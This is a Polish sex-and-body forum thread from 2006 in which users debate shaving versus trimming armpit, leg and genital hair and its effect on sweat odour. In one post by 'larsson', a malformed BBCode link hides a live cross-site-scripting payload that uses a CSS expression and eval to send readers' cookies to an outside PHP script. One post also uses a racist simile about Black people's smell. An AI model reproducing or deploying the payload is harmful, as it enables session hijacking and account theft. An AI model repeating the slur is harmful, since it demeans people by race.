stringi u faceta

Zagadnienia związane ze sferą fizyczną (cielesną), a także z problemami dotyczącymi tematów współżycia i kontaktów cielesnych. Pozycje seksualne - wymiana doświadczeń.

Moderator: modTeam

Awatar użytkownika
Sir Charles
Weteran
Weteran
Postautor: Sir Charles » 08 lut 2006, 11:09

((missi)), dalej nie odpowiedziałaś na pytanie - po co golisz pachy?

Ale skoro nie musi to po co sobie ma golić np. nogi? co?

No nogi to nie wiem po co. Ani nie wiem po co golić, bo to chyba tylko przysparza problemów. Ale przyciąć włosy pod pachami - a i owszem. Lepiej się czuję, dezodorant lepiej działa, a pot nie śmierdzi. To tak w skrócie i dobitnie. Już wiesz Mysior po co? :)
soul of a woman was created below
((missi))

Postautor: ((missi)) » 08 lut 2006, 11:12

Bo nei wyobrazam siebie z zarosneitymi pachami :> jestem kobieta i mi to pasuje.
Awatar użytkownika
KyLu
Pasjonat
Pasjonat
Postautor: KyLu » 08 lut 2006, 11:13

Pachy gole ze wzgledow higienicznych i zapachowych, a jajka tez (od czasu do czasu) - reszta owlosienia zostaje na swoim wlasciwym miejscu :]
Awatar użytkownika
Sir Charles
Weteran
Weteran
Postautor: Sir Charles » 08 lut 2006, 11:18

((missi)) pisze:Bo nei wyobrazam siebie z zarosneitymi pachami

To jedyny powód? To błąd uzasadnienia cyrkularnego - jeżeli przestaniesz się golić, to nie będziesz musiala sobie wcale wyobrażać. :)

((missi)) pisze:jestem kobieta

No i wiesz jaka jest dzisiaj różnica między kobietą a mężczyzną? <hahaha> Że facet może sobie golić/strzyc pachy, a dziewczyna musi golić. No chyba, że któras tego nie robi? Jest tu taka? :D

((missi)) pisze:mi to pasuje.

Ten argument litościwie pominę :)
Awatar użytkownika
Mysiorek
Weteran
Weteran
Postautor: Mysiorek » 08 lut 2006, 11:28

Sir Charles pisze:Lepiej się czuję, dezodorant lepiej działa, a pot nie śmierdzi. To tak w skrócie i dobitnie. Już wiesz Mysior po co?

No to tak w skrócie i dobitnie:
-śmierdzi Tobie, jako właścicielowi, a niektóre (wyselekcjonowane) samice przyciąga. Taka jego rola. Tak to zrobiła natura.

Czy już wiesz Charlie po co się nie golić?

<hahaha> <hahaha> <hahaha> <hahaha> <hahaha>
KOCHAJ...i rób co chcesz!
((missi))

Postautor: ((missi)) » 08 lut 2006, 11:30

daj sobie juz na wstrzymanie. czepiasz sie kazdego mojego slowa, :) Daj se na luz. Jestem baba i zle sie czuje jakjestem zarosnieta, gole sie bo tak mi lepiej. I jak Ty chesz sie golic to rob to. Tylko nei staraj sie w durny sposob pokazac kto ma racje. Bo Ty masz swoja ja mam swoja. Tobie to pasuje i dla Ciebie to normalne, a dla mnie nie i wszystko
Awatar użytkownika
Sir Charles
Weteran
Weteran
Postautor: Sir Charles » 08 lut 2006, 11:32

Mysiorek pisze:śmierdzi Tobie, jako właścicielowi, a niektóre (wyselekcjonowane) samice przyciąga.

Tani trik natury ;P
Mysiorek pisze:Czy już wiesz Charlie po co się nie golić?

Ale ja nie narzekam Mysior :)
Awatar użytkownika
Miltonia
Weteran
Weteran
Postautor: Miltonia » 08 lut 2006, 11:33

Sir Charles pisze:
((missi)) pisze:Bo nei wyobrazam siebie z zarosneitymi pachami

To jedyny powód? To błąd uzasadnienia cyrkularnego - jeżeli przestaniesz się golić, to nie będziesz musiala sobie wcale wyobrażać. :)

Ubawilam sie <hahaha>

A co do golenia. Nie wiem, po jakiego grzyba tak robic. Jeszcze niedawno kobiety u nas biegaly z zarosnietymi nogami (nawet kilkanascie lat temu) i bylo dobrze. Ba, nawet pod pachami golily sie tylko na lato. Niezle?

Mam taka ksiazke z lat 60-tych, amerykanski instruktaz seksualny. Tam wszystkie kobiety maja wlasy pod pachami.
A teraz to takie obrzydliwe niby. Kultura i juz. Na szczescie zmierza wszystko w ta strone, ze i mezczyzni beda musieli sie golic. Niech choc w tym bedzie po rowno, a co! <cisza>
"a miłość tylko jedną można wszędzie spotkać
przed grzechem i po grzechu zostaje ta sama"
((missi))

Postautor: ((missi)) » 08 lut 2006, 11:33

Mysiorek pisze:No to tak w skrócie i dobitnie:
-śmierdzi Tobie, jako właścicielowi, a niektóre (wyselekcjonowane) samice przyciąga. Taka jego rola. Tak to zrobiła natura.

Ja tego nie wiem, wole jak facet pachnie ale gdzies czytalam w necie ze facetow przyciaga zapach tygodniowego sluzu z naszej pipki. ze on jest jak afrodyzjak :P Tego nie sprawdzalam i chyba nei sprawdze ;)
Awatar użytkownika
Sir Charles
Weteran
Weteran
Postautor: Sir Charles » 08 lut 2006, 11:36

((missi)) pisze:I jak Ty chesz sie golic to rob to.

Nie chce sie golić i nie golę się :)
((missi)) pisze:Tylko nei staraj sie w durny sposob pokazac kto ma racje.

Chciałbym wiedzieć w którym miejscu się ta moja durnota objawia? :>
Awatar użytkownika
Mysiorek
Weteran
Weteran
Postautor: Mysiorek » 08 lut 2006, 11:41

Sir Charles pisze:Ale ja nie narzekam Mysior

I tak trzymaj.
Teraz męczy się piżmaki jako substytut męskiego zapachu ;P (i nie tylko męskiego), bo włosów coraz mniej.

Miltonia pisze:zmierza wszystko w ta strone, ze i mezczyzni beda musieli sie golic. Niech choc w tym bedzie po rowno, a co!

Dorzućmy jeszcze ładny makijaż <diabel>
KOCHAJ...i rób co chcesz!
((missi))

Postautor: ((missi)) » 08 lut 2006, 11:42

Sir Charles pisze:Chciałbym wiedzieć w którym miejscu się ta moja durnota objawia?

nie powiedzialam ze ejstes durny :> tylko ze w durny sposob chces zmi cos udowodnic. Nie mozesz mi powiedziec w normalny sposob 'stara sluchaj nei zgadzam sie z Toba dla mnei jest tak i tak' itp wtedy spoko, a nie ze jedziesz mi na kazdym kroku. Co powiem to zawsze jakies niemile odzywki w stosunku do mnie. Chcesz mi cos wygarnac napisz do mnie na priv albo zaloz nowy temat "nie lubie missi" i wygadajj sie.
Awatar użytkownika
Ted Bundy
Weteran
Weteran
Postautor: Ted Bundy » 08 lut 2006, 11:44

Miltonia pisze:A teraz to takie obrzydliwe niby. Kultura i juz. Na szczescie zmierza wszystko w ta strone, ze i mezczyzni beda musieli sie golic

po moim trupie:D <evilbat> Mężczyzna IMHO golić powinien wyłącznie zarost na twarzy - wystarczy... <hahaha>
http://www.facebook.com/LKSPogonLwow

Reaktywowany w 2009 r. Razem przywróćmy świetność tej historycznej drużynie!

http://www.piotrlabuz.pl/
http://michalpasterski.pl/
http://www.mateuszgrzesiak.pl/
Awatar użytkownika
Yasmine
Weteran
Weteran
Postautor: Yasmine » 08 lut 2006, 11:48

Jak facet sie chce golic, to niech sie goli. Ale mi to sie w ogole nie podoba. Nie wyobrazam sobie mojego oglonego pod pachami czy na nogach :|. Uwielbiam wloski <zakochany>.
Awatar użytkownika
Sir Charles
Weteran
Weteran
Postautor: Sir Charles » 08 lut 2006, 11:51

((missi)) pisze:Nie mozesz mi powiedziec w normalny sposob 'stara sluchaj nei zgadzam sie z Toba dla mnei jest tak i tak'

I co? Tak ma wg Ciebie to forum wyglądać? Topik "co lubicie jesc" - "ja lubie truskawki", "aha fajnie, a ja wole lody", "a ja nie lubie lodow, wole kotlety..." <hahaha>

Nic Ci nie chcę wygarnąć. A udowodnić - a i owszem, ale nie coś, tylko lichość fundamentów, na których opierasz swoją argumentację w tej kwestii. A lichość fundamentów najłatwiej zaprezentować, przez ich naruszenie i samoczynne wywrócenie tego, co na nich :)

Ale nie przejmuj się - taki Ted np w ogóle nie ma argumentów :D

[ Dodano: 2006-02-08, 11:53 ]
Yasmine pisze:Jak facet sie chce golic, to niech sie goli.

Pamiętajmy czym się różni golenie od przystrzygania. W życiu bym się pod pachą nie ogolił.
Awatar użytkownika
Yasmine
Weteran
Weteran
Postautor: Yasmine » 08 lut 2006, 11:59

Sir Charles pisze:Pamiętajmy czym się różni golenie od przystrzygania. W życiu bym się pod pachą nie ogolił.

Przystrzyganie jak najbardziej :). Byleby tam cos jeszcze zostalo :D.
Paula
Pasjonat
Pasjonat
Postautor: Paula » 08 lut 2006, 13:01

Jak wolicie , żeby wam waliło z pod pachy jak z murzyńskiej chaty, Wasza sprawa, ale zrozumcie pot sie wtedy nie rozkłada jak nie ma na czym. blech. facet chce mnie objąc w lecie, podnosi ręke a ty kłaki i syff-yhhhh, fuuuuu.
Awatar użytkownika
TFA
Weteran
Weteran
Postautor: TFA » 08 lut 2006, 13:08

Jak wolicie , żeby wam waliło z pod pachy jak z murzyńskiej chaty, Wasza sprawa, ale zrozumcie pot sie wtedy nie rozkłada jak nie ma na czym. blech. facet chce mnie objąc w lecie, podnosi ręke a ty kłaki i syff-yhhhh, fuuuuu.

Ja nie gole i nigdy nie smierdze konskim potem, nawet dzieczyny mnie chwala ze zawsze pachne <aniolek>
Ręce me do szabli stworzone, nie do kielni.
Awatar użytkownika
ForsakenXL
Maniak
Maniak
Postautor: ForsakenXL » 08 lut 2006, 13:11

TFA pisze:nigdy nie smierdze konskim potem

Ja też, nawet w lecie, ale mimo wszystko przystrzygam/golę bo lepiej się czuję. Bardziej - że tak powiem - przewiewnie i mimo wszystko świeżość dłużej się utrzymuje.
Tak właściwie to zacząłem dopiero w tym roku przystrzygać, potem jakoś dorwałem się do kremu do depilacji i spróbowałem - a co :P
No i jest fajnie :]
Nogi też raz ogoliłem na zasadzie "a spróbować można" no i doszedłem do jednego wniosku: NIGDY WIĘCEJ, choćby nie wiem co :/
"Czymże jest życie, jeśli nie szeregiem natchnionych szaleństw?Trzeba tylko umieć je popełniać!
A pierwszy warunek: nie pomijać żadnej sposobności, bo nie zdarzają się co dzień"
~George Bernard Shaw
Paula
Pasjonat
Pasjonat
Postautor: Paula » 08 lut 2006, 13:18

TFA pisze:nigdy nie smierdze konskim potem

moze nie czujesz, że smierdzisz
Awatar użytkownika
TFA
Weteran
Weteran
Postautor: TFA » 08 lut 2006, 13:24

fajna82 pisze:moze nie czujesz, że smierdzisz

Chyba lepiej wiem :> i wiem tez jak inni faceci potrafia smierdziec ze nie idzie wytrzymac, nie jestem brudasem, zreszta kilka kobiet juz mi powiedzialo ze dziwia sie ze nigdy nie smierdze, nawet po wysilku fizycznym. Moze ty trafiasz na samych smierdzieli.
Awatar użytkownika
ForsakenXL
Maniak
Maniak
Postautor: ForsakenXL » 08 lut 2006, 13:26

Zresztą cała ta rozmowa o włosach niepotrzebna, i tak już dawno naukowcy stwierdzili, że ewolucja konsekwentnie pozbawia nas owłosienia z każdym pokoleniem :]
To co jeszcze mamy to pozostałości po naszej 'warstwie ochronnej', którą teraz zastąpiły ubrania. Oczywiscie jest jeszcze dużo 'brakujących ogniw' (niektórzy chyba nieco później zeszli z drzew :D), ale nikt nie powiedział że to się dokona z dnia na dzień <mruga>
"Czymże jest życie, jeśli nie szeregiem natchnionych szaleństw?Trzeba tylko umieć je popełniać!
A pierwszy warunek: nie pomijać żadnej sposobności, bo nie zdarzają się co dzień"
~George Bernard Shaw
Awatar użytkownika
TFA
Weteran
Weteran
Postautor: TFA » 08 lut 2006, 13:28

Zreszta pocenie sie nie zalezy od wlosow, tylko od gruczolow potowych, jeden sie wygoli i bedzie walil jak turek, a drugi ma wlosy i nigdy nie smierdzi, czego ja jestem przykladem.
Paula
Pasjonat
Pasjonat
Postautor: Paula » 08 lut 2006, 13:31

Tak zgadzam się pocenie nie zależy od włosów ale rozkładanie się potu na nich jak najbardziej. racja dyskusja nie ma sensu .każdy ma swoje zdanie i wie w czym mu sie najlepiej chodzi.
Awatar użytkownika
TFA
Weteran
Weteran
Postautor: TFA » 08 lut 2006, 13:34

fajna82 pisze:Tak zgadzam się pocenie nie zależy od włosów ale rozkładanie się potu na nich jak najbardziej

Racja, ale jak ktos sie nie poci jak knur to nie ma co sie rozkladac na wlosach.

fajna82 pisze:każdy ma swoje zdanie

Raczej kazdy ma swoj organizm i zdolnosc do smierdzacego pocenia.
larsson
Zaglądający
Zaglądający
Postautor: larsson » 08 lut 2006, 13:35

stringom zdecydowane nie! :]
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.49mb.com/users/kisobox/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
Awatar użytkownika
Yasmine
Weteran
Weteran
Postautor: Yasmine » 08 lut 2006, 15:19

fajna82 pisze:moze nie czujesz, że smierdzisz

moj tez nie goli, a nie smierdzi.
Dziwne, nie o_0 ?
Awatar użytkownika
ksiezycowka
Weteran
Weteran
Postautor: ksiezycowka » 08 lut 2006, 20:26

Miltonia pisze:eszcze niedawno kobiety u nas biegaly z zarosnietymi nogami (nawet kilkanascie lat temu) i bylo dobrze. Ba, nawet pod pachami golily sie tylko na lato. Niezle?

Moja mama sama twierdzi ze kiedys było to bardzo kobiece. :/
Tak samo teraz męskie włosy maja stanowic o męskości? :/
Awatar użytkownika
lollirot
Weteran
Weteran
Postautor: lollirot » 08 lut 2006, 20:33

moon pisze:Tak samo teraz męskie włosy maja stanowic o męskości?

czymś się muszą ratować frajerzy, u których nic poza tymi włosami o męskości nie stanowi ;-) <browar>
pan nie jest moim pasterzem
a niczego mi nie brak
nie przynależę i nie wierzę
i chociaż idę ciemną doliną
zła się nie ulęknę i nie klęknę.
Awatar użytkownika
TFA
Weteran
Weteran
Postautor: TFA » 08 lut 2006, 20:40

moon pisze:Tak samo teraz męskie włosy maja stanowic o męskości?

lollirot pisze:czymś się muszą ratować frajerzy, u których nic poza tymi włosami o męskości nie stanowi ;-)

A czy ktos z facetow tutaj twierdzi ze to stanowi o meskosci ? :| jak narazie tylko jedna osoba tak tutaj twierdzi i to w dodatku kobieta :|

Wróć do „Seks, kontakt fizyczny”